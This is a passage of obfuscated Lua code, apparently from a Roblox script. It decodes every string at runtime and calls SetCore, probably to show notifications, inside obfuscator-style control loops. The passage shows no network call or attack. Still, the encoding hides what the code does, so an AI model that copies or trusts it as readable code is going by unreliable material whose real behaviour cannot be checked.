v91.Visible=true;game:GetService(v7("\151\13\13\168\81\173\167\23\177\16","\80\196\121\108\218\37\200\213")):SetCore(v7("\51\118\12\123\101\1\158\9\117\11\124\74\26\131\15\125","\234\96\19\98\31\43\110"),{[v7("\50\22\70\203\169","\235\102\127\50\167\204\18")]=v7("\98\160\248\57\94","\78\48\193\149\67\36"),[v7("\4\27\152\12","\33\80\126\224\120")]=v7("\220\169\16\208\89\172\188\11\193\28\199\141\58\132\93\226\172\67\231\80\229\171\8\132\121\194\156\38\246","\60\140\200\99\164"),[v7("\174\247\11\40","\194\231\148\100\70")]=v7("\84\78\217\183\254\221\75\78\155\236\185\220\95\92\196\254\215\219\85\73\213\229\255\204\27\29\148\250\175\154\19\26\153\245\175\157\0\91\156\242\163\152\0\68\156\242\163\152","\168\38\44\161\195\150")});Duration=12 + 8 ;wait(1);v106=19 -14 ;end end end);else local v104=0;local v105;while true do if (v104==(0 + 0)) then v105=0 -0 ;while true do if (v105==(0 + 0)) then game:GetService(v7("\79\227\40\36\39\161\110\208\60\63","\196\28\151\73\86\83")):SetCore(v7("\192\6\39\20\172\87\12\127\245\10\42\17\150\81\23\120","\22\147\99\73\112\226\56\120"),{[v7("\140\124\246\249\136","\237\216\21\130\149")]=v7("\176\79\82\69\170","\62\226\46\63\63\208\169"),[v7("\209\28\77\151","\62\133\121\53\227\127\109\79")]=v7("\36\28\59\230\150\167\177\80\26\61\225\150\131\143\66\84\31\244\208\175\169\17","\194\112\116\82\149\182\206"),[v7("\16\171\67\22","\110\89\200\44\120\160\130")]=v7("\185\193\83\82\75\95\54\79\241\140\4\82\90\90\62\16\138\208\88\67\87\12\50\73\246\146\30\31\26\24\110\27\243\149\18\19\5\93\102\28\254\147\13\78\30\27\110\29","\45\203\163\43\38\35\42\91")});Duration=6 + 5 ;break;end end break;end end end